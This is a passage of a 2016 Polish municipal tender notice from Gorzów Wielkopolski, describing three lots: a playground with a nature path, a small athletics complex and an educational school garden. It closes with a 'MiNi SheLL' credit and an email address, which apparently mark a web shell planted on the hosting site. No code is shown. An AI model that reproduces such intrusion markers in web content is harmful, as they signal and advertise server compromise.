a) w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziłoby niewykonaniem lub wadliwym wykonaniem przedmiotu umowy,
b) w przypadku zaistnienia odmiennych od przyjętych w dokumentacji projektowej warunków geologicznych skutkujących niemożliwością zrealizowania przedmiotu umowy przy pierwotnie przyjętych założeniach technologicznych,
c) zaistnieją odmienne od przyjętych w dokumentacji projektowej warunki terenowe, w  szczególności zostanie stwierdzone istnienie nieujętych w dokumentacji projektowej podziemnych urządzeń, sieci uzbrojenia terenu, instalacji  lub  obiektów infrastrukturalnych, 
d) w przypadku konieczności zrealizowania przedmiotu umowy przy  zastosowaniu innych rozwiązań  technicznych/technologicznych  niż wskazane w dokumentacji projektowej w sytuacji, jeżeli rozwiązania te będą miały znaczący wpływ na obniżenie kosztów eksploatacji, poprawy bezpieczeństwa, które ze względu na postęp techniczno-technologiczny nie były znane w okresie opracowywania dokumentacji projektowej, 
e) zrealizowania przedmiotu umowy przy zastosowaniu zamiennych rozwiązań technicznych lub materiałowych ze względu na postanowienia decyzji organów administracji państwowej lub z uwagi na korzyści dla Zamawiającego,
f) z uwagi na wyłączenie części robót objętych umową na wniosek Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.wrota.lubuskie.pl/umgorzow/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Gorzowa Wlkp. ul. Sikorskiego 3-4, 66-400 Gorzów Wlkp..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.06.2016 godzina 08:30, miejsce: Urząd Miasta Gorzowa Wlkp. ul. Sikorskiego 3-4, 66-400 Gorzów Wlkp. Kancelaria ogólna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Budowa placu zabaw  ze ścieżką przyrodniczą na terenie Szkoły Podstawowej nr 4 przy ul. Kobylogórskiej 110..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot robót obejmuje: 
- rozbiórkę istniejącej nawierzchni asfaltowej płyty boiska.
- wykonanie nawierzchni: bezpiecznej (Piaskowej) na części zabawowo-rekreacyjnej, komunikacyjnej na pozostałym obszarze części zabawowo-rekreacyjnej oraz z betonowej kostki brukowej na części edukacyjno-przyrodniczej (nawierzchnie powinny być wykonane zgodnie ze szczegółowymi wytycznymi zawartymi w projekcie zagospodarowania terenu). 
- wyposażenie części zabawowo-rekreacyjnej w posiadające odpowiednie atesty i certyfikaty bezpieczeństwa urządzenia, których typ i ilość wyszczególnione zostały w projekcie zagospodarowania terenu, 
- urządzenie zieleni poprzez nasadzenie drzew i krzewów (wg ilości i rodzaju wskazanych w projekcie), posadzenie żywopłotu z 63 sztuk krzewu bukszpanu,
- wykonanie ogrodu zmysłów o pow. min. 25 m2 zgodnie z wytycznymi określonymi w projekcie zagospodarowania terenu. 
- wykonanie alpinarium o pow. 55 m2 zgodnie z wytycznymi określonymi w projekcie zagospodarowania terenu. 
- wykonanie ogrodu botanicznego o pow. 52 m2 zgodnie z wytycznymi określonymi w projekcie zagospodarowania terenu. 
- założenie łąki kwietnej o powierzchni min. 210 m2 zgodnie z wytycznymi określonymi w projekcie zagospodarowania terenu. 
- wykonanie muld chłonnych zgodnie z wytycznymi określonymi w projekcie zagospodarowania terenu. 
- wykonanie studni chłonnej zgodnie z wytycznymi określonymi w projekcie zagospodarowania terenu.
- wykonanie gier malowanych na asfalcie zgodnie z wytycznymi określonymi w projekcie zagospodarowania terenu. 
- wykonanie pasa płyt ściekowych zgodnie z wytycznymi określonymi w projekcie zagospodarowania terenu. 
- wykonanie innych elementów zagospodarowania terenu: tablic edukacyjnych, tablic gatunkowych - drzewa i krzewy, tablic gatunkowych - byliny i drobna roślinność ogrodu botanicznego, alpinarium i ogrodu zmysłów, tablicy informacyjnej z miejscami wschodu i zachodu słońca, światowidu, zegara słonecznego, tablicy edukacyjnej łąki kwietnej i gnomonu, skały na alpinarium wraz z tabliczkami informacyjnymi i górki zabaw.
- wykonanie tablic informacyjnych zawierających regulamin korzystania z obiektów.
- wykonanie i montaż tablicy informującej o źródle finansowania inwestycji - tablica Budżetu Obywatelskiego - wg załączonego wzoru o minimalnych wymiarach 40x60cm umieszczona w widocznym miejscu w pobliżu inwestycji (na innych tablicach z regulaminem lub w ramach osobnej tablicy).
Uwaga. Płyty zjazdowe zjeżdżalni należy wykonać z tworzywa sztucznego, zapewniając tym samym  maksymalne bezpieczeństwo bawiących się na tych obiektach dzieci..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.10.00.00-8, 45.11.00.00-1, 45.11.10.00-8, 45.11.20.00-5, 45.23.00.00-8, 45.23.30.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin końcowy wykonania zamówienia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Budowa mini kompleksu lekkoatletycznego przy boisku Zespołu Szkół Budowlanych przy ul. Okrzei 42..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
- likwidacja istniejącej bieżni i stworzenie w jej miejscu nowej czterotorowej bieżni długości pasów 100 m (całkowita długość projektowanego elementu to 120,75m). Bieżnia o nawierzchni syntetycznej poliuretanowej ułożonej na przepuszczalnej podbudowie z kruszywa oraz z betonu jamistego. Wyposażenie bieżni w blok startowy treningowy o długości 80 cm, posiadający na długości 58 cm skokową regulację rozstawu płytek, oparcia stóp co 2,5 cm, mocowany do bieżni za pomocą kołków.
- budowa skoczni do skoku w dal umiejscowionej równolegle do bieżni. Rozbieg skoczni oraz podbudowa pod nawierzchnią o parametrach i technologii jak na bieżni. Wyposażenie skoczni w belkę do skoku w dal laminowaną, wzmocnioną (wykonaną z żywicy epoksydowej) o wymiarach 1201 x 340 x 100mm, skrzynkę do skoku w dal wykonaną z blachy aluminiowej, fundamentowaną na rozbiegu o wymiarach 1220 x 300 x 100mm. Pokrywa skrzynki wykonana z blachy stalowej cynkowanej ogniwo, zamykającej skrzynie po wyjęciu belki, góra pokrywy wyklejona powierzchnią sztuczną, z której wykonany jest rozbieg skoczni.
- budowa rzutni do pchnięcia kulą składającej się z koła i pola rzutów. Koło obramowane pierścieniem stalowym o średnicy wewnętrznej 1,135m wykonanym z płaskownika 0,6x0,8cm. Nawierzchnia koła projektowana jako betonowa zatarta na ostro. Pole rzutów o wymiarach wycinka koła 34 stopni 92 minuty o promieniu 20m o nawierzchni z mączki ceglanej ograniczony obrzeżem betonowym 8x30cm z nakładką elastyczną. Miedzy kołem a polem rzutów należy zainstalować próg wykonany z drewna klejonego i pokryty laminatem, montowany do podłoża za pomocą kołków rozporowych.
- wykonanie tablic informacyjnych zawierających regulamin korzystania z obiektów sportowych i ich montaż na przedmiotowych obiektach.
- wykonanie i montaż tablicy informującej o źródle finansowania inwestycji - tablica Budżetu Obywatelskiego - wg załączonego wzoru o minimalnych wymiarach 40x60cm umieszczona w widocznym miejscu w pobliżu inwestycji (na innych tablicach z regulaminem lub w ramach osobnej tablicy)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.28-8, 45.10.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin końcowy wykonania zamówienia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Budowa ogródka dydaktycznego Świat wokół nas przy Szkole Podstawowej nr 12 przy ul. Dobrej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot robót obejmuje: 
- rozbiórkę istniejącej nawierzchni asfaltowej płyty boiska.
- wykonanie nawierzchni naturalnej - w tym  zielonej wyspy o pow. 130 m2, ścieżki wokół zielonej wyspy o pow. 100 m2 i trawnika 855 m2 . 
- wykonanie i montaż następujących elementów małej architektury: bramy wejściowej z logiem szkoły i napisem Ogródek dydaktyczny, stelaża pod regulamin korzystania z obiektu, stelaża pod tablice edukacyjne łączony w czworobok, stelaż pod tablice edukacyjne jednostronny, tablice edukacyjne do zamontowania na stelażach, tablica z regulaminem użytkowania, fotościanka, memo poznaj zwierzę, wrzutki, puzzle jakie to zwierzę, gra rozkład śmieci, światowid, wiatromierz, zadaszone ławo stoły drewniane, drewniana ciuchcia, trzy kosze do segregacji odpadów. Ww. elementy wykonane powinny być w przeważającym udziale z drewna.
- wykonanie i montaż elementów małej architektury niemontowanej trwale z gruntem: kompostownik, drewniana ciuchcia, kosze do segregacji odpadów, karmnik dla ptaków, budki lęgowe dla ptactwa rozwieszone na drzewach, zadaszone ławo stoły drewniane.
- wykonanie brukowanego placu przy elemencie kierunki świata.
- urządzenie zieleni: nasadzenie roślinności, obsianie terenu trawą i przycięcie (prześwietlenie) znajdujących się na terenie inwestycji drzew.
- wykonanie i montaż tablicy informującej o źródle finansowania inwestycji - tablica Budżetu Obywatelskiego - wg załączonego wzoru o minimalnych wymiarach 40x60cm umieszczona w widocznym miejscu w pobliżu inwestycji (na innych tablicach z regulaminem lub w ramach osobnej tablicy).
- Rozbiórka dwóch nieużytkowanych murowanych budynków gospodarczych jednokondygnacyjnych (budynki nr ewid. 349;4 i 349;5 o pow. zabudowy 54 m2 i 20 m2) znajdujących się na terenie działki 349 dla których decyzją z dnia 9.12.2015 r. sprostowaną postanowieniem z dnia 07.06.2016 r. PINB dla miasta Gorzów Wlkp. wydał nakaz rozbiórki.
- Wywóz materiału porozbiórkowego oraz uporządkowanie terenu objętego rozbiórką..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.10.00.00-8, 45.11.10.00-8, 45.11.20.00-5, 45.23.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin końcowy wykonania zamówienia - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com